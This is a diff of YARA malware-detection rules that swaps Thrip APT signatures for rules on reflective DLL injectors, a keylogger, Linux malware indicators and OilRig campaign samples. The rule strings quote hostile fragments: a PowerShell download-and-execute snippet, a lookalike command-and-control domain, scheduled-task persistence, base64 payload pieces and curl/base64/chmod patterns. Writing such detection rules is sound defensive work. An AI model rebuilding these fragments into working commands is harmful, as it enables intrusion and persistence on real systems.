 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0d2abdcaad99e102fdf6574b3dc90f17cb9d060c20e6ac4ff378875d3b91a840"
+		hash1 = "d594f60e766e0c3261a599b385e3f686b159a992d19fa624fad8761776efa4f0"
 
 	strings:
-		$s1 = "C:\\Windows\\SysNative\\cmd.exe" fullword ascii
-		$s2 = "C:\\Windows\\SysNative\\sysprep\\cryptbase.dll" fullword ascii
+		$x1 = " -p <TARGET PROCESS NAME> | -u <DLL PAYLOAD> [--obfuscate]" fullword wide
+		$x2 = "You've selected to inject into process: %s" fullword wide
+		$x3 = "Lynx DLL Injector" fullword wide
+		$x4 = "Reflective DLL Injector" fullword wide
+		$x5 = "Failed write payload: %lu" fullword wide
+		$x6 = "Failed to start payload: %lu" fullword wide
+		$x7 = "Injecting payload..." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_4 : FILE
+
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_2 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Reflective DLL Loader - suspicious - Possible FP could be program crack"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dcfcdbd-d18f-5eba-a10c-95686f010f23"
-		date = "2018-06-21"
+		id = "5948d9ba-e655-5b11-ad74-f650b3a753e7"
+		date = "2017-08-20"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L64-L85"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L102-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f258070054a29cbec0876536d295b85c7bd9f23988d1e0fc2ba58660b0796716"
-		score = 75
+		logic_hash = "f01b2cf754c3527d0d7fd44c28d3cdb9327762572b43a7d6f7667e5c2a26ab17"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b236d3fc54d36e6dc2a26299f6ded597058fed7c9099f1a37716c5e4b162abc"
+		hash1 = "c2a7a2d0b05ad42386a2bedb780205b7c0af76fe9ee3d47bbe217562f627fcae"
+		hash2 = "b90831aaf8859e604283e5292158f08f100d4a2d4e1875ea1911750a6cb85fe0"
 
 	strings:
-		$s1 = "\\system32\\wbem\\tmf\\caches_version.db" ascii
-		$s2 = "ProcessName No Access" fullword ascii
-		$s3 = "Hwnd of Process NULL" fullword ascii
-		$s4 = "*********The new session is be opening:(%d)**********" fullword ascii
-		$s5 = "[EXECUTE]" fullword ascii
-		$s6 = "/------------------------------------------------------------------------" fullword ascii
-		$s7 = "constructor or from DllMain." fullword ascii
-		$s8 = "Time:%d-%d-%d %d:%d:%d" fullword ascii
-		$s9 = "\\info.config" ascii
+		$x1 = "\\ReflectiveDLLInjection-master\\" ascii
+		$s2 = "reflective_dll.dll" fullword ascii
+		$s3 = "DLL injection" fullword ascii
+		$s4 = "_ReflectiveLoader@4" ascii
+		$s5 = "Reflective Dll Injection" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "59867122bcc8c959ad307ac2dd08af79" or pe.exports ( "_ReflectiveLoader@4" ) or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_5 : FILE
+
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_3 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Reflective DLL Loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42c56ed6-a509-568f-a611-ce7e5c5d9d8e"
-		date = "2018-06-21"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L87-L101"
+		id = "91842f58-5205-533d-9e97-a1e84fbf259d"
+		date = "2017-08-20"
+		modified = "2022-12-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L130-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f2d4cfd55017ebb34fb6e8ad1b0b46b184926c69d4bacee88dc639771f96792"
+		logic_hash = "4fbba94e6d3dc7b4976c90c0f95683c548f3c444bf5eaf0a7c55d96150978a67"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "32889639a27961497d53176765b3addf9fff27f1c8cc41634a365085d6d55920"
+		hash1 = "d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474"
 
 	strings:
-		$s2 = "c:\\windows\\USBEvent.exe" fullword ascii
-		$s5 = "c:\\windows\\spdir.dat" fullword ascii
+		$s1 = "\\Release\\inject.pdb" ascii
+		$s2 = "!!! Failed to gather information on system processes! " fullword ascii
+		$s3 = "reflective_dll.dll" fullword ascii
+		$s4 = "[-] %s. Error=%d" fullword ascii
+		$s5 = "\\Start Menu\\Programs\\reflective_dll.dll" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "26ba48d3e3b964f75ff148b6679b42ec" or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_6 : FILE
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_4 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Reflective DLL Loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a1c65bc1-371e-509f-a01c-2d58c1773f95"
-		date = "2018-06-21"
+		id = "d2a28ea6-a3f7-5ceb-86fd-1e5b7f916a41"
+		date = "2017-08-20"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L103-L116"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L156-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f6cc84ebed26a0dbecfcb3ffb3a11c111ae3d5b40497d59ada518d33bee57fdd"
+		logic_hash = "b988ea586589dced18f2165eff431be897b3e96fce2d124f5f41d52b520ccd76"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44f58496578e55623713c4290abb256d03103e78e99939daeec059776bd79ee2"
+		hash1 = "205b881701d3026d7e296570533e5380e7aaccaa343d71b6fcc60802528bdb74"
+		hash2 = "f76151646a0b94024761812cde1097ae2c6d455c28356a3db1f7905d3d9d6718"
 
 	strings:
-		$s1 = "C:\\Windows\\system32\\Instell.exe" fullword ascii
+		$x1 = "<H1>&nbsp;>> >> >> Keylogger Installed - %s %s << << <<</H1>" fullword ascii
+		$s1 = "<H3> ----- Running Process ----- </H3>" fullword ascii
+		$s2 = "<H2>Operating system: %s<H2>" fullword ascii
+		$s3 = "<H2>System32 dir:  %s</H2>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_7 : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Linux_Malware_Indicators_Aug20_1 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
 		author = "Florian Roth (Nextron Systems)"
-		id = "16739590-eb88-5de2-bd76-974b3343ec19"
-		date = "2018-06-21"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L118-L131"
+		id = "9a1093a6-0239-5d1c-aa30-1ca725941583"
+		date = "2020-08-03"
+		modified = "2025-02-12"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_lnx_malware_indicators.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "198f8869e56d5549d9195524a86f6557162c5d25b4915bec0bf513797d880ea1"
-		score = 75
+		logic_hash = "fbe84c936709653480d469a07e284aea7ef68aedaaa4295073ce59d37eb6d791"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b714dc1c7e58589374200d2c7f3d820798473faeb26855e53101b8f3c701e3f"
 
 	strings:
-		$s1 = "C:\\runme.exe" ascii
+		$s1 = "&& chmod +x" ascii
+		$s2 = "|base64 -" ascii
+		$s3 = " /tmp" ascii
+		$s4 = "|curl " ascii
+		$s5 = "whoami" ascii fullword
+		$fp1 = "WITHOUT ANY WARRANTY" ascii
+		$fp2 = "postinst" ascii fullword
+		$fp3 = "THIS SOFTWARE IS PROVIDED" ascii fullword
+		$fp4 = "Free Software Foundation" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them
+		filesize < 400KB and 3 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_8 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen1 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5eb98c9e-5103-5146-9364-d5f24416406f"
-		date = "2018-06-21"
+		id = "d291edf1-b086-5c61-b131-61c9f6e1267b"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L133-L148"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L12-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6c8ddc7fb5f3256e57e66f502f6e3c582d82540f773bf4113cac4a685d45f81b"
+		logic_hash = "17dbf53ba6e27b230e3357963162a1805c6460cdadce8bba68953a97f699e1b7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f2d09b1ad0694f9e71eeebec5b2d137665375bf1e76cb4ae4d7f20487394ed3"
+		hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34"
+		hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e"
+		hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f"
+		hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996"
+		hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da"
+		hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4"
+		hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1"
+		hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777"
+		hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e"
+		hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281"
+		hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353"
+		hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51"
+		hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2"
+		hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39"
+		hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d"
+		hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9"
+		hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579"
+		hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b"
+		hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0"
+		hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa"
+		hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471"
+		hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064"
+		hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff"
+		hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4"
+		hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e"
 
 	strings:
-		$x1 = "$.oS.Run('cmd.exe /c '+a+'" fullword ascii
-		$x2 = "new $._x('WScript.Shell');" ascii
-		$x3 = ".ExpandEnvironmentStrings('%Temp%')+unescape('" ascii
+		$x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii
+		$x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii
+		$x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
+		$s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii
+		$b1 = "JGdsb2JhbDpteWhvc3QgP" ascii
+		$b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii
+		$b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii
+		$b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii
+		$b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii
+		$b6 = "d2hvYW1pICYgaG9zdG5hb" ascii
 
 	condition:
-		filesize < 10KB and 1 of ( $x* )
+		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_9 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal1 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fcd8d7f-ed60-5155-a0dd-f3a36f3f2981"
-		date = "2018-06-21"
+		id = "c577f0ff-1a33-5d7f-93b2-27df8d414bce"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L150-L170"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L69-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0500481ae4bb7d4a223a106d2887b994e5000815704e678b2f3ff127a86c22a2"
+		logic_hash = "b5fc4329bb639765890c49907860883b96d278381b83307c906f624e6645dedd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8e6682bcc51643f02a864b042f7223b157823f3d890fe21d38caeb43500d923e"
-		hash2 = "0c8ca0fd0ec246ef207b96a3aac5e94c9c368504905b0a033f11eef8c62fa14c"
-		hash3 = "6d0a2c822e2bc37cc0cec35f040d3fec5090ef2775df658d3823e47a93a5fef3"
-		hash4 = "0c49d1632eb407b5fd0ce32ed45b1c783ac2ef60d001853ae1f6b7574e08cfa9"
+		hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc"
+
+	strings:
+		$x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii
+		$x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii
+		$x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii
+		$x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii
+		$s1 = "http://winodwsupdates.me" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "a7f0714e82b3105031fa7bc89dfe7664" or pe.imphash ( ) == "8812ff21aeb160e8800257140acae54b" or pe.imphash ( ) == "44a1e904763fe2d0837c747c7061b010" or pe.imphash ( ) == "51a854d285aa12eb82e76e6e1be01573" or pe.imphash ( ) == "a1f457c8c549c5c430556bfe5887a4e6" )
+		( uint16( 0 ) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_10 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen2 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Oilrig malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3307ca18-59fb-5400-b51e-c4f4aa99e592"
-		date = "2018-06-21"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L172-L189"
+		id = "2ca0aadf-c5a8-5c89-ab1e-0c06d2ab8516"
+		date = "2016-10-12"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L88-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79a8dfd63e96ccc9259272476e364e53b841b42255a2a5f3b9f93e91caa5d1c2"
+		logic_hash = "861ae1696aaa89c81d04214e67d77d98ae85bd7f64ae2979fbe932dc696fd32c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "350d2a6f8e6a4969ffbf75d9f9aae99e7b3a8cd8708fd66f977e07d7fbf842e3"
+		hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d"
+		hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb"
 
 	strings:
-		$x1 = "!This Program cannot be run in DOS mode." fullword ascii
-		$x2 = "!this program cannot be run in dos mode." fullword ascii
-		$s1 = "svchost.dll" fullword ascii
-		$s2 = "constructor or from DllMain." fullword ascii
+		$s1 = "%userprofile%\\AppData\\Local\\Microsoft\\" ascii
+		$s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" fullword ascii
+		$s3 = "&{$rn = Get-Random; $id = 'TR" fullword ascii
+		$s4 = "') -replace '__',('DNS'+$id) | " fullword ascii
+		$s5 = "\\upd.vbs" ascii
+		$s6 = "schtasks /create /F /sc minute /mo " fullword ascii
+		$s7 = "') -replace '__',('HTP'+$id) | " fullword ascii
+		$s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" fullword ascii
+		$s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or 2 of them )
+		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 2 of ( $s* ) ) or ( 4 of them )
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_11 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen3 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Oilrig malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69476f7d-c436-5863-bf20-1d3e821974e6"
-		date = "2018-06-21"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L191-L210"
+		id = "1cd5f7ea-4ae6-5642-b8b3-050cfe724e69"
+		date = "2016-10-12"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L112-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "066fc3622a0db5cc511e85f6efc08191c2c9268524c8761dc17a05e6d133c263"
+		logic_hash = "ccc110b04ea3ee9a19ff23babbc759b4ec6114f8b5eb4f42bc5f70f8abde8a53"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "590a6796b97469f8e6977832a63c0964464901f075a9651f7f1b4578e55bd8c8"
+		hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
+		hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
+		hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
 
 	strings:
-		$s1 = "\\AppData\\Local\\Temp\\dw20.EXE" ascii
-		$s2 = "C:\\Windows\\system32\\sysprep\\cryptbase.dll" fullword ascii
-		$s3 = "WFQNJMBWF" fullword ascii
-		$s4 = "SQLWLWZSF" fullword ascii
-		$s5 = "PFQUFQSBPP" fullword ascii
-		$s6 = "WQZXQFPVOW" fullword ascii
+		$x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii
+		$x2 = "\\Libraries\\fireueye.vbs" ascii
+		$x3 = "\\Libraries\\fireeye.vbs&" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "6eef4394490378f32d134ab3bf4bf194" or all of them )
+		( uint16( 0 ) == 0xcfd0 and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_12 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal2 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b24b8042-b6a3-5af8-9fcf-6d042bdb9524"
-		date = "2018-06-21"
+		id = "7a6c38e7-bed9-524b-b4a5-c6c895b9c049"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L212-L234"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L131-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49357a34f3b1d0bb86d1c6ddfa6a6c3b92bfafaebd050d835c0a902199a2121b"
+		logic_hash = "b1de7dc3c205c78825f52ea30608b10bafa2c486db53693aa90aa07138fb1a87"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33c01d3266fe6a70e8785efaf10208f869ae58a17fd9cdb2c6995324c9a01062"
+		hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf"
 
 	strings:
-		$s1 = "pGlobal->nOSType==64--%s\\cmd.exe %s" fullword ascii
-		$s2 = "httpcom.log" fullword ascii
-		$s3 = "\\CryptBase.dll" ascii
-		$s4 = "gupdate.exe" fullword ascii
-		$s5 = "wusa.exe" fullword ascii
-		$s6 = " %s %s /quiet /extract:%s\\%s\\" ascii
-		$s7 = "%s%s.dll.cab" fullword ascii
-		$s8 = "/c %s\\%s\\%s%s %s" fullword ascii
-		$s9 = "ReleaseEvildll" fullword ascii
-		$s0 = "%s\\%s\\%s%s" fullword ascii
+		$x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii
+		$x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
+		$x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide
+		$x4 = "mailto:Tarik.Imam@gartner.com" fullword wide
+		$x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii
+		$x6 = "2dy53My5vcmcvMjAw" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 6 of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 200KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_13 : FILE
+rule SIGNATURE_BASE_Oilrig_Campaign_Reconnaissance : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Windows discovery commands - known from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e6aec6f3-2024-5fb2-b37a-77a182684d32"
-		date = "2018-06-21"
+		id = "a4fe24b8-290a-5a4a-9f81-bbbd9aae6c6e"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L236-L254"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L151-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c319a3ca78687cd2af77d97b4b4a8e72dadd812bf3da2145a23df278c3aa9a2"
+		logic_hash = "04c9f482c0c4abc1bf316459dc3085154defadb0fd5fe74ff274d8b3ee807b7f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "780620521c92aab3d592b3dc149cbf58751ea285cfdaa50510002b441796b312"
+		hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
-		$s2 = "<member><name>password</name>" fullword ascii
-		$s3 = "<value><string>qqtorspy</string></value>" fullword ascii
-		$s4 = "SOFTWARE\\QKitTORSPY" fullword wide
-		$s5 = "ipecho.net" fullword ascii
